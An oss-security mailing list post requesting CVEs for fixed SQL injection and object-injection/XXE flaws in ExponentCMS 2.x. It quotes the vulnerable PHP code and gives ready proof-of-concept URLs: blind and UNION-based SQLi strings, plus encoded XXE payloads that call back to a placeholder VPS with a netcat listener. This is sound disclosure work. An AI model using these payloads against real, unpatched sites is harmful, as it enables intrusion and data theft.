Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 30 Sep 2016 12:22:38 +0800
From: Carl Peng <felixk3y@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE request: ExponentCMS 2.x Object Injection and SQLi vulnerabilities

hello,
I reported the following vulnerabilities to the ExponentCMS team some days
ago, and now has been fixed.

1) sqli-1
/framework/modules/ecommerce/controllers/cartController.php
lines 61 - 66:
```
$product_type = isset($this->params['product_type']) ?
$this->params['product_type'] : 'product';
$product      = new product();
//if we're trying to add a parent product ONLY, then we redirect to it's
show view
$c = new stdClass();
if (isset($this->params['product_id']) && empty($this->params['children']))
$c = $product->find('first', 'parent_id=' . $this->params['product_id']);
//sqli
if (!empty($c->id)) {
flash('message', gt("Please select a product and quantity from the options
listed below to add to your cart."));
redirect_to(array('controller'=> 'store', 'action'=> 'show', 'id'=>
$this->params['product_id']));
}
```
the parameter of "product_id" fail to filtered, we can input
"product_id=sqli" to execute SQL statements.
Proof of concept:
/index.php?controller=cart&action=addItem&product_id=-1/**/and/**/1=if(1,sleep(1),0)%23

2) sqli-2
/framework/modules/help/controllers/helpController.php
lines 122 - 131:
```
if (empty($this->params['version']) || $this->params['version'] ==
'current') {
            $version_id = help_version::getCurrentHelpVersionId();
   } else {
            $version_id =
help_version::getHelpVersionId($this->params['version']); //sqli
            if (empty($version_id)) {
                $version_id = help_version::getCurrentHelpVersionId();
            }
   }
   $doc = $help->find('first', 'help_version_id='.$version_id.' AND
sef_url="'.$this->params['title'].'"'); //sqli
        $children = $help->find('count','parent='.$doc->id);
```
The parameters of "version" and "title" fail to filtered, we can input
"version=sqli" or "title=sqli"to execute SQL statements.
Proof of concept:
/index.php?controller=help&action=show&version=1" union select
1%23&title=aaa" union select
1,user(),3,4,5,6,7,8,9,0,11,12,1,2,3,4,5,6,7,8,9,0,11,12%23

3) Object Injection -1
/framework/modules/core/controllers/expTagController.php#L228-L232
```
foreach ($this->params['change_tag'] as $item) { // $item from user input
    $params['expTag'] = array();
    $classname = $this->params['mod'];
    $object = new $classname($item); // $classname also from user input
    expTag::deleteTag($this->params['mod'], $object->id);
    //...
}
```
Proof of concept(XXE):
[ We could use php class "SimpleXMLElement"(
http://cn2.php.net/manual/en/simplexmlelement.construct.php) to exploit it ]
step 1:
VPS listening.. (nc -lvvp 8080)
step 2:
/index.php?controller=expTag&action=change_tags&mod=SimpleXMLElement&change_tag[]=%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2Fvps_ip%3A8080%2Fxxe_exists%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E

4) Object Injection -2
/framework/modules/core/controllers/expCatController.php#L175-L182
```
if (!empty($this->params['change_cat'])) {
foreach ($this->params['change_cat'] as $item) {
$classname = $this->params['mod'];
$object = new $classname($item);
$params['expCat'][0] = $this->params['newcat'];
$object->update($params);
}
}
```
Proof of concept(XXE):
[ We could use php class "SimpleXMLElement"(
http://cn2.php.net/manual/en/simplexmlelement.construct.php) to exploit it ]
step 1:
VPS listening.. (nc -lvvp 8080)
step 2:
/index.php?controller=expCat&action=change_cats&mod=SimpleXMLElement&change_cat[]=%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2Fyour_vps_ip%3A8080%2Fxxe_exists%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E

[root@...ud ~]# nc -lvvp 8080
Listening on any address 8080 (webcache)
Connection from 8.8.8.8:63017
GET /xxe_exists HTTP/1.0
Host: your_vps_ip:8080


And now, all vulnerabilities have been fixed.
https://github.com/exponentcms/exponent-cms/commit/99636b2118cd9af4eb9920f6b6c228bd824593d2
https://github.com/exponentcms/exponent-cms/commit/fdafb5ec97838e4edbd685f587f28d3174ebb3db

these issues was reported by Peng Hua of silence.com.cn Inc. and I would
like to request CVEs for these issues (if not done so).

-------------------http://www.silence.com.cn/
penghua@...ence.com.cn
PKAV Team

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.